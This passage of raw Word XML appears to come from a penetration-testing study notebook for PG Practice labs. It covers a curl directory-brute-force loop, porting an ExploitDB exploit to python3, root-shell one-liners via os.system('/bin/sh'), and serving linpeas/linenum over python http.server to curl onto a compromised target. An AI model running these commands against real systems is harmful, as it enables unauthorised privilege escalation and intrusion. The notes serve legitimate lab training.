        <w:t xml:space="preserve"> → reads one line at a time from the file (dictionary.txt) and puts it into the variable ENTRY.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000341F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">done &lt; dictionary.txt </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ tells the loop to read lines from the file dictionary.txt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003420">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003421">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In simple terms: for each line in dictionary.txt, do the following.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003422">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003423">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">do curl "${BASE_URL}${ENTRY}"; echo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003424">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside the loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003425">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1411"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl "${BASE_URL}${ENTRY}"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → sends an HTTP GET request to http://192.168.213.95/&lt;ENTRY&gt; where &lt;ENTRY&gt; is the current line from the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1411"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> → prints a blank line (just for neat output spacing).</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003427">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What does it do overall?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003428">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It reads every line from dictionary.txt, appends it to http://192.168.213.95/, makes a curl request to that full URL, and prints a blank line between results.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342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2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_p04l9c8oqr7q" w:id="465"/>
      <w:bookmarkEnd w:id="465"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_sn9nao10ggr" w:id="466"/>
      <w:bookmarkEnd w:id="466"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to change code from python2 to python3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000342F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1129">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Internal</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, they had an exploit from exploitDB using python2. And when they tried to run it using the "python" command, it didn't work. So, they showed us how to change the code from python2 syntax to python3 syntax. Read the writeup for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003430">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003431">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003432">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003433">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_c018qyuytl2v" w:id="467"/>
      <w:bookmarkEnd w:id="467"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get a bash shell when running python</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003434">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003435">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you are able to execute a python file as root, run this python line to open a shell (this code needs to be in a python file. This is not bash so it can't be run in the terminal):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003436">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="951"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os; os.system("/bin/sh")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003437">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003438">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if you are not in the python code but rather the terminal, then you can run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo python -c 'import os; os.system("/bin/sh")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1130">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Walla</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we could run a python file as root. We removed it and replaced it with a file that had this, and we got root shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1293"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">import os; os.setuid(0); os.system("/bin/sh")</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1293"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">os.setuid(0)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> might be redundant but it's good to be safe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000343F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000034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41">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003442">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_6tx7l4q9ns8s" w:id="468"/>
      <w:bookmarkEnd w:id="468"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Hosting (to Transfer files to target)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003444">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003445">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TIP: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On the target machine, move to /tmp or any other non-important directory since sometimes if you are in another directory, you might not have valid permissions to upload to that directory</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003446">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003447">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes, you want to move something to a target machine after getting a reverse shell, like a LinEnum.sh file. But, you can't curl the .sh file from inside the target machine. So, you can locally host the file through python, and then curl that from the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003448">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh [insert URL]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003449">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace linenum.sh with your desired name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this LOCALLY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -m http.server 8000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Within the same directory where you ran the above, open a python server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000344D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1317"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -o </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linpeas.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;your_local_IP&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:8000/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">linenum.sh</w:t>
      </w:r>
    </w:p>
